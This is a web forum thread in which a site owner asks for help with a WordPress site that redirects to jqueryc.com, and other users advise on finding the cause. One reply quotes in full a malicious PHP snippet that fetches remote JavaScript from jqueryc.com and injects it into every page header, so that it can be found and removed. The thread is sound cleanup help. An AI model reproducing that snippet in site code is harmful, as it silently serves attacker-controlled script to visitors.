Hey all, Think I've been hacked or the site I recently got from flippa has malicious code in it. I cannot get in to any link on the site now before it redirects to jqueryc.com Anyone know how to fix this? google isn't helping me this time...
this is most probably because of a stolen theme or you dnt have the license for this theme. this is generally added by developers in fuctions.php file of the theme
It doesn't have any paid themes with it - the only paid content on there is Amazon Estore Plugin. Does this mean I have an illegal version of it? Or could the seller have inserted it in to the code just to peeve me off?
as far as i can tell its the theme... look for folowing code in wp-contents.. themes.. your theme folder... functions.php if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} Code (markup): just remove it and save and this issue will b fixed
It's definitely not the Theme, there isn't one activated, the Plugin itself acts as a theme. Amazon eStore Plugin. So there is no functions.php with it. Any other Ideas?
Grep all the site's files for jqueryc. When you find it, post the line before it, the line it's in and the line after it. (If you don't have any other way, download all the files on the site to a new folder on your computer. Download and install Wingrep. Run Wingrep on the folder, looking for jqueryc.)
Rukbat, I used Wingrep and it worked! Found a bit of malicious code in a completely random post.php! Thank you so much Rukbat! I have a feeling this plugin has been stolen though so I will contact the creator and purchase it from them again.